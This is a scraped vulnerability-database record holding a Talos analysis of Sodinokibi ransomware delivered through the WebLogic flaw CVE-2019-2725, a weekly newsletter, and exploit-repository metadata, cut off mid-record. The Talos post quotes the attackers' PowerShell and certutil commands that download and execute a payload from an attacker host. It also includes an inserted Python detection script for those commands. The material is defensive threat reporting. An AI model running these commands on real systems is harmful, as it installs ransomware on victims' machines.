AsyncResponderService of the Oracle WebLogic Server. \n \n\n\n[](<https://2.bp.blogspot.com/-LBiprLucWao/XMhzXoXTbeI/AAAAAAAAArc/A19jWXIN8MoqmAHkg7ZxuNIhJTXJkIRRQCLcBGAs/s1600/image3.jpg>)\n\n_Activity from April 26. The attackers are downloading the Sodinokibi ransomware._ \n \n \nHistorically, most varieties of ransomware have required some form of user interaction, such as a user opening an attachment to an email message, clicking on a malicious link, or running a piece of malware on the device. In this case, the attackers simply leveraged the Oracle WebLogic vulnerability, causing the affected server to download a copy of the ransomware from attacker-controlled IP addresses 188.166.74[.]218 and 45.55.211[.]79. 
The 188.166.74[.]218 IP address is also home to a pair of other malicious domains unrelated to this ransomware attack: arg0s-co[.]uk, which is likely a [phishing domain](<https://www.phishtank.com/phish_detail.php?phish_id%3D6005605>), and projectstore[.]guru, a domain with bogus PDF-related Google search results. The other IP, 45.55.211[.]79, hosts a pair of legitimate Chilean domains, and appears to have been infected and repurposed by the attackers. The attackers were ultimately successful at encrypting a number of systems during this incident. \n \nCisco IR Services and Talos observed the attack requests originating from 130.61.54[.]136. The HTTP POST request contained arguments to a cmd.exe instruction \u2014 a PowerShell command to download a file called \"radm.exe\" from host 188.166.74[.]218, then save that file locally and execute it. \n \n\n \n \n cmd /c powershell.exe wget http[:]//188.166.74[.]218/radm.exe -outfile %TEMP%/radm.exe&cmd.exe /c %TEMP%\\\\radm.exe \n \n\n \nIn addition to PowerShell, we also observed the attackers creatively passing the certutil utility to cmd to download a file: \n \n\n \n \n cmd /c cmd.exe /c certutil.exe -urlcache -split -f http[:]//188.166.74[.]218/radm.exe %TEMP%/radm.exe&cmd.exe /c %TEMP%\\\\radm.exe \n \n\n \nBesides \"radm.exe,\" researchers observed multiple file names in the PowerShell and certutil commands, including: \n \n\n\n> hxxp[:]//188.166.74[.]218/office.exe \nhxxp[:]//188.166.74[.]218/radm.exe \nhxxp[:]//188.166.74[.]218/untitled.exe \nhxxp[:]//45.55.211[.]79/.cache/untitled.exe\n\n \nOnce detonated in [Threat Grid](<https://panacea.threatgrid.com/mask/samples/fbb1cc7a40ef2254f31ee800a00a0a5d>), the sandbox identified this sample as potential ransomware. 
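The exploitation pattern described above (an external HTTP POST to the /_async/ AsyncResponderService whose body carries a cmd.exe download-and-execute command) translates directly into detection logic. The Python below is an added example for this page, not Talos's own tooling. It assumes request records with the decoded POST body are available, for instance from a WAF or reverse-proxy log; it flags POSTs to the "/_async/*" and "/wls-wsat/*" paths that the Conclusion recommends restricting, matches the PowerShell and certutil command patterns quoted above (the iwr, Invoke-WebRequest and curl aliases are an assumed variant, not something observed here), and pulls the payload URLs out of the body for blocking. The sample requests are constructed: they reuse the command lines and the 130.61.54[.]136 and 188.166.74[.]218 addresses from this post, while the 10.0.0.0/8 traffic is made up for contrast.

```python
import re
from ipaddress import ip_address

# Paths Talos recommends blocking from external access; a POST to either is how
# CVE-2019-2725 is reached (the post names AsyncResponderService under /_async/).
VULNERABLE_PATH_PREFIXES = ("/_async/", "/wls-wsat/")

# Download-and-execute patterns derived from the two command lines quoted above.
# The wget alternatives are PowerShell aliases and are an assumption about variants.
DOWNLOAD_EXEC_PATTERNS = [
    ("powershell-download", re.compile(
        r"powershell(?:\.exe)?\b.*?\b(?:wget|iwr|invoke-webrequest|curl)\b.*?https?://",
        re.IGNORECASE | re.DOTALL)),
    ("certutil-download", re.compile(
        r"certutil(?:\.exe)?\s+-urlcache\b.*?-f\s+https?://",
        re.IGNORECASE | re.DOTALL)),
    # Execution of the freshly dropped file from %TEMP%, as in both observed commands.
    ("temp-exec", re.compile(
        r"cmd(?:\.exe)?\s+/c\s+%TEMP%[\\/][\w.-]+\.exe", re.IGNORECASE)),
]
URL_RE = re.compile(r"https?://[^\s\"'<>&]+", re.IGNORECASE)


def is_external(src_ip: str) -> bool:
    """True for a routable source address; RFC 1918, loopback and link-local are internal."""
    addr = ip_address(src_ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local)


def classify(method: str, src_ip: str, path: str, body: str):
    """Return (findings, urls) for one request: tags explaining why it is suspicious,
    and any HTTP(S) URLs found in the body (candidate payload-distribution hosts)."""
    findings = []
    if method.upper() == "POST" and path.startswith(VULNERABLE_PATH_PREFIXES):
        findings.append("post-to-vulnerable-uri")
        if is_external(src_ip):
            findings.append("external-source")
    for tag, pattern in DOWNLOAD_EXEC_PATTERNS:
        if pattern.search(body):
            findings.append(tag)
    return findings, URL_RE.findall(body)


def scan(requests):
    """Run classify() over (method, src_ip, path, body) records and keep only the hits."""
    hits = []
    for method, src_ip, path, body in requests:
        findings, urls = classify(method, src_ip, path, body)
        if findings:
            hits.append({"src": src_ip, "path": path, "findings": findings, "urls": urls})
    return hits


def extract_download_urls(requests):
    """Set of payload URLs seen in flagged requests, for egress blocking and pivoting."""
    return {url for hit in scan(requests) for url in hit["urls"]}


# Constructed sample records (method, source IP, path, decoded POST body).
SAMPLE_REQUESTS = [
    ("POST", "130.61.54.136", "/_async/AsyncResponderService",
     "cmd /c powershell.exe wget http://188.166.74.218/radm.exe -outfile "
     "%TEMP%/radm.exe&cmd.exe /c %TEMP%\\radm.exe"),
    ("POST", "130.61.54.136", "/_async/AsyncResponderService",
     "cmd /c cmd.exe /c certutil.exe -urlcache -split -f "
     "http://188.166.74.218/radm.exe %TEMP%/radm.exe&cmd.exe /c %TEMP%\\radm.exe"),
    ("GET", "10.0.0.5", "/console/login/LoginForm.jsp", ""),           # benign, made up
    ("POST", "10.0.0.7", "/_async/AsyncResponderService", "<soapenv:Envelope/>"),  # internal, made up
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(hit["src"], hit["path"], ", ".join(hit["findings"]), hit["urls"])
```

An internal POST to the vulnerable path still produces a finding, only without the external-source tag: the April 25 probing described above shows that a first touch can look innocuous, so the path match is worth alerting on regardless of source, with the source tag driving severity.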
\n \n\n\n[](<https://3.bp.blogspot.com/-jFgwvg54THU/XMhzd3fe5LI/AAAAAAAAArk/UTe-kIHef6UZZY5yb2v-J0e7mZpQhDWRwCLcBGAs/s1600/image5.png>)\n\n \n \nOn VirusTotal, [43 out of 71 engines](<https://www.virustotal.com/%23/file/0fa207940ea53e2b54a2b769d8ab033a6b2c5e08c78bf4d7dade79849960b54d/detection>) flagged the same binary, identified by its SHA-256 hash. \n \nBelow, we can see the malicious file \"untitled.exe\" using \"cmd.exe\" to execute the vssadmin.exe utility. This is a common ransomware tactic to prevent users from easily recovering their data: it deletes the Volume Shadow Copies that Windows keeps as a default backup mechanism, so the original files cannot be restored from them. \n \n\n\n[](<https://3.bp.blogspot.com/-23uDUCegltE/XMhzmi3-mXI/AAAAAAAAArs/Xtv5prwuva0Qr9ZPjyhK7i9Wh40JQgTNQCLcBGAs/s1600/image1.png>)\n\n \n \nThe ransom note, in this case, directs victims to either a .onion website on the Tor network or a site on the public web at the domain decryptor[.]top, registered on March 31 this year. With Sodinokibi, each encrypted system receives a distinct encrypted file extension. The ransom note filename also includes this extension as a prefix (ex. 88f2947s-HOW-TO-DECRYPT.txt). \n \n\n\n[](<https://2.bp.blogspot.com/-HNv7PGAPG5M/XMhzq_mdtBI/AAAAAAAAAr0/iQ6l7CSc1IwJGMedRkjCxX-4iQjHJn67ACLcBGAs/s1600/image2.jpg>)\n\n \n \n\n\n### The Gandcrab affiliate connection\n\n \nAfter deploying Sodinokibi ransomware inside the victim's network, the attackers followed up with an additional CVE-2019-2725 exploit attempt approximately eight hours later. However, this time, the attackers chose to distribute Gandcrab v5.2. We find it strange that the attackers would choose to distribute a second, different ransomware on the same target. Sodinokibi being a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab. 
\n \n\n\n### Conclusion\n\n \nThis attack is notable because of the attackers' use of a zero-day exploit to distribute ransomware. Whereas [previously](<https://blog.talosintelligence.com/2016/03/samsam-ransomware.html>) we have witnessed ransomware attackers taking advantage of unpatched systems to install and laterally propagate ransomware, this zero-day exploitation method could work on otherwise fully-patched systems. \n \nThe victims in this ransomware attack were able to activate their Incident Response Retainer with Cisco IR Services, and they received immediate support and advice on managing the incident. The immediate actions taken likely prevented a more significant outage. \n \nDue to the ubiquity of Oracle WebLogic servers and the ease of exploitation of this vulnerability, Talos expects widespread attacks involving CVE-2019-2725, and we recommend the following actions. Any number of layered controls could prevent or otherwise deter this type of attack, including: \n \n\n\n * Patch WebLogic as soon as possible against CVE-2019-2725.\n * Log and centrally collect web, application, and operating system events.\n * Restrict the access of the account used to run the WebLogic process.\n * Monitor for signs of compromise:\n * Egress network communications from data center systems.\n * Ransomware \"Canary\" files.\n * External HTTP POSTs to new URIs.\n * Web shells.\n * Unexpected activity of service/system accounts (WebLogic user).\n * Scan for, understand, and mitigate your vulnerability posture.\n * Restrict egress Data Center communications.\n * Segment the network for defense and monitoring.\n * Control URL access (in this case external access to \"/_async/*\" and \"/wls-wsat/*\").\n * Plan for Disaster Recovery, including maintaining and testing data backups and recovery.\n * Configure PowerShell to execute only signed scripts. Note that execution policy governs script files, not commands passed directly on the powershell.exe command line as in this attack, so pair it with command-line logging and application control.\n \n \n \n\n\n### Indicators of Compromise (IoC)\n\n \n**Ransomware samples:** 
\n0fa207940ea53e2b54a2b769d8ab033a6b2c5e08c78bf4d7dade79849960b54d \n34dffdb04ca07b014cdaee857690f86e490050335291ccc84c94994fa91e0160 \n74bc2f9a81ad2cc609b7730dbabb146506f58244e5e655cbb42044913384a6ac \n95ac3903127b74f8e4d73d987f5e3736f5bdd909ba756260e187b6bf53fb1a05 \nfa2bccdb9db2583c2f9ff6a536e824f4311c9a8a9842505a0323f027b8b51451 \n \n**Distribution URLs:** \nhxxp://188.166.74[.]218/office.exe \nhxxp://188.166.74[.]218/radm.exe \nhxxp://188.166.74[.]218/untitled.exe \nhxxp://45.55.211[.]79/.cache/untitled.exe \n \n**Attacker IP:** \n130.61.54[.]136 \n \n**Attacker Domain:** \ndecryptor[.]top \n \n[](<https://4.bp.blogspot.com/-s2BzeGmzUMU/XMihm3CakTI/AAAAAAAAAsU/osy0RP3N9qMlbJLqYN1sSq7z5FQGtDemACLcBGAs/s1600/coverage.png>)\n\n", "cvss3": {}, "published": "2019-05-01T12:37:18", "type": "talosblog", "title": "Sodinokibi ransomware exploits WebLogic Server vulnerability", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2019-05-01T12:37:18", "id": "TALOSBLOG:311242B8285F529AAB4833CDEBC9989C", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/OFcQbj3TV_Q/sodinokibi-ransomware-exploits-weblogic.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-02T18:19:08", "description": "[](<http://4.bp.blogspot.com/-YLRBgfX54uk/XKYbVrHlGXI/AAAAAAAAFu8/MxjUEd-3hhQTW4tZkat-cLDi8G5tVm6bgCK4BGAYYCw/s1600/threat-source.png>) \n_Newsletter compiled by Jonathan Munshaw._ \n \nWelcome to this week\u2019s Threat Source newsletter \u2014 the perfect place to get caught up on all things Talos from the past week. \n \nIf you haven\u2019t yet, there\u2019s still time to [register for this year\u2019s Talos Threat Research Summit](<https://www.ciscolive.com/us/learn/programs/talos-threat-research-summit.html>) \u2014 our second annual conference by defenders, for defenders. 
This year\u2019s Summit will take place on June 9 in San Diego \u2014 the same day Cisco Live kicks off in the same city. We sold out last year, so hurry to register! \n \nThis week was stacked with original research. First up was the [Sodinokibi ransomware](<https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html>), which we saw being distributed via a zero-day vulnerability in Oracle WebLogic. Today, we also released our findings on a [new variant of Qakbot](<https://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html>), which is more difficult to detect than older versions. \n \nFinally, we also have our [weekly Threat Roundup](<https://blog.talosintelligence.com/2019/04/threat-roundup-0419-to-0426.html>), which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we\u2019ve seen (and blocked) over the past week. \n\n\n### Upcoming public engagements with Talos\n\n**Event:** [Copenhagen Cybercrime Conference](<https://www.cyberhagen.com/event/39cd5ea8-2155-4d38-8128-34b457dc0e98/websitePage:645d57e4-75eb-4769-b2c0-f201a0bfc6ce?5S%2CM3%2C39cd5ea8-2155-4d38-8128-34b457dc0e98=>)\n\n**Location:** Industriens Hus, Copenhagen, Denmark\n\n**Date:** May 29\n\n**Speaker:** Paul Rascagn\u00e8res\n\n**Synopsis:** Paul will give an overview of an espionage campaign targeting the Middle East that we called \u201cDNSpionage.\u201d First, he will go over the malware and its targets, and then describe the process the attackers used to redirect the targets\u2019 DNS records. The talk will include a timeline of all events in this attack, including an alert from the U.S. 
Department of Homeland Security.\n\n### Cyber Security Week in Review\n\n * Cisco disclosed a [critical vulnerability in the Nexus 9000 Series Application Centric Infrastructure (ACI) ](<https://www.networkworld.com/article/3392858/cisco-issues-critical-security-warning-for-nexus-data-center-switches.html>)Mode data-center switch that could allow an attacker to secretly access system-level resources. The company disclosed 39 other bugs, as well, on Thursday.\n * The latest version of Google Chrome [fixed two vulnerabilities](<https://news.softpedia.com/news/google-releases-chrome-74-update-with-critical-security-fixes-525831.shtml>) in the web browser. One is considered to be of \u201chigh\u201d severity: An out-of-bounds vulnerability in SQLite.\n * Citrix says attackers were able to obtain persistence on their systems for about six months and may have [stolen employees\u2019 personal data](<https://www.zdnet.com/article/hackers-lurked-in-citrix-systems-for-six-months/?utm_source=newsletter&utm_medium=email&utm_campaign=newsletter_axioscodebook&stream=technology>). The software company says the breadth of the attack is not yet known but could involve stolen Social Security numbers, names and financial information.\n * Financial data from several large companies were [leaked online](<https://nakedsecurity.sophos.com/2019/05/02/extortionists-leak-data-of-huge-firms-after-it-provider-refuses-to-pay/?utm_source=newsletter&utm_medium=email&utm_campaign=newsletter_axioscodebook&stream=technology>) after a technology company refused to pay a ransom. German IT provider Citycomp had data stolen in an attack, including information on Oracle, Porsche and Toshiba.\n * Magecart launched a [renewed attack on OpenCart websites](<https://www.bleepingcomputer.com/news/security/magecart-group-12-targets-opencart-websites/>). The credit card-stealing malware is going after the e-commerce platform, which is one of the three most popular shopping interfaces for sites to use. 
\n * Slack warned potential investors that it could be the [target of a nation-state-backed cyber attack](<https://securityboulevard.com/2019/04/slack-to-investors-we-might-be-the-target-of-organized-crime-nation-sponsored-hackers/>). The group messaging platform revealed the ongoing threats ahead of its expected IPO.\n * An exposed database [holds sensitive information](<https://www.engadget.com/2019/04/29/database-exposes-80-million-us-households/>) on more than 80 million American households \u2014 but no one seems to know who owns it.\n * Apple [removed several parental control apps](<https://www.securityweek.com/apple-claims-parental-control-apps-removed-due-use-mdm>) from its store. The company said the programs were utilizing illicit, \u201chighly invasive\u201d mobile device management techniques.\n * Norwegian aluminum maker Norsk Hydro estimates a recent ransomware attack [cost the company the equivalent of $52 million](<https://www.reuters.com/article/norsk-hydro-outlook/update-1-norsk-hydro-expects-cyber-attack-costs-of-nearly-52-mln-in-q1-idUSL5N22C12R>) in the first quarter. \n\n### Notable recent security issues\n\n**Title: **[Oracle vulnerability opens users to remote code execution attacks](<https://www.zdnet.com/article/new-oracle-weblogic-zero-day-discovered-in-the-wild/>) \n**Description: **Oracle released an out-of-band patch for a WebLogic Server vulnerability that could allow an attacker to carry out remote code execution attacks. Security researchers discovered the bug being exploited earlier this month by attackers in the wild. Oracle assigned the bug CVE-2019-2725 and gave it a CVSS score of 9.8/10, highlighting how serious the issue is. WebLogic server owners are urged to update as soon as possible. 
\n\n\n**Snort SIDs:** 49942, 49943\n\n \n\n\n**Title:** _[JasperLoader targets Europe with Gootkit banking trojan](<https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html>)_ \n**Description: **A loader known as \"JasperLoader\" has been increasingly active over the past few months and is currently being distributed via malicious spam campaigns primarily targeting central European countries, with a particular focus on Germany and Italy. JasperLoader employs a multi-stage infection process that features several obfuscation techniques that make analysis more difficult. It appears that this loader was designed with resiliency and flexibility in mind, as evidenced in later stages of the infection process. \n**Snort SIDs:** 49914, 49915\n\n### Most prevalent malware files this week\n\n**SHA 256:** [3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3](<https://www.virustotal.com/#/file/3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3/details>) \n**MD5:** 47b97de62ae8b2b927542aa5d7f3c858 \n**Typical Filename:** qmreportupload.exe \n**Claimed Product:** qmreportupload \n**Detection Name:** Win.Trojan.Generic::in10.talos \n \n**SHA 256:** [7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510](<https://www.virustotal.com/#/file/7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510/details>) \n**MD5:** 4a50780ddb3db16ebab57b0ca42da0fb \n**Typical Filename: **xme64-2141.exe \n**Claimed Product:** N/A \n**Detection Name: **W32.7ACF71AFA8-95.SBX.TG \n \n**SHA 256: **[c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f](<https://www.virustotal.com/#/file/c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f/details>) \n**MD5:** e2ea315d9a83e7577053f52c974f6a5a \n**Typical Filename: **Tempmf582901854.exe \n**Claimed Product:** N/A \n**Detection Name: **W32.AgentWDCR:Gen.21gn.1201 \n \n**SHA 256:** 
[15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b](<https://www.virustotal.com/#/file/15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b/details>) \n**MD5:** 799b30f47060ca05d80ece53866e01cc \n**Typical Filename:** 799b30f47060ca05d80ece53866e01cc.vir \n**Claimed Product:** N/A \n**Detection Name: **W32.Generic:Gen.21ij.1201 \n \n**SHA 256:** [d05a8eaf45675b2e0cd6224723ededa92c8bb9515ec801b8b11ad770e9e1e7ed](<https://www.virustotal.com/#/file/d05a8eaf45675b2e0cd6224723ededa92c8bb9515ec801b8b11ad770e9e1e7ed/details>) \n**MD5:** 6372f770cddb40efefc57136930f4eb7 \n**Typical Filename:** maftask.zip \n**Claimed Product: **N/A \n**Detection Name: **PUA.Osx.Adware.Gt32supportgeeks::tpd \n\n\n \n\n\n", "cvss3": {}, "published": "2019-05-02T11:00:01", "type": "talosblog", "title": "Threat Source (May 2, 2019)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2019-05-02T11:00:01", "id": "TALOSBLOG:E398382645C9465F51D4AC68FBE13C7B", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/U2AnuIUndfA/threat-source-may-2-2019.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "githubexploit": [{"lastseen": "2022-04-05T16:21:50", "description": "# Log4j Threat Hunting and Incident Response Resources\n\n## Lates...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-09T08:22:24", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-34473", "CVE-2021-44228"], "modified": "2022-01-10T19:21:49", "id": "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-29T23:35:43", "description": "# CVE-2019-2725\nWebLogic Universal Exploit - CVE-2017-3506 / CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-08-23T01:42:57", "type": "githubexploit", "title": "Exploit for Injection in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2017-10271", "CVE-2017-3506"], "modified": "2021-12-29T12:52:27", 
"id": "7BA07704-21CC-5BFC-A0F9-8FDA2BC84402", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:47:01", "description": "# CVE-2021-26084\nCVE-2021-26084 Confluence OGNL injection\n\n![\u56fe\u7247]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-03T07:41:36", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-12-27T09:00:16", "id": "B16D26DB-D60C-5C0C-9452-80112720B442", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:45:54", "description": "# CVE-2021-26084\nThis i...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 
"version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-02T07:05:23", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-02T07:07:25", "id": "DC2A0BD8-2ABF-5885-957D-0FA3B058665C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T23:25:08", "description": "# CVE-2021-26084\nCVE-2021-26084 - Confluence Pre-Auth RCE | O...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-31T16:33:32", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 
"LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-29T01:57:05", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2022-08-04T07:47:37", "id": "24A6D0CC-8F53-539E-8FBC-D5222C4BC565", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-15T19:21:36", "description": "# CVE-2019-2725\n# weblogic\u547d\u4ee4\u56de\u663e+webshell\u4e0a\u4f20<br/>\n**\u514d\u8d23\u58f0\u660e:\u672c\u5de5\u5177\u4ec5\u4f9b\u5b89\u5168\u6d4b\u8bd5\u5b66...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-10T05:12:44", "type": "githubexploit", "title": "Exploit for Injection in Oracle Agile Plm", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2022-08-15T15:41:28", "id": "96B2FD46-0F7E-5581-BBA6-E4A48966E225", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T20:31:07", "description": "# REDIS-CVE-2022-0543\nRedis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": 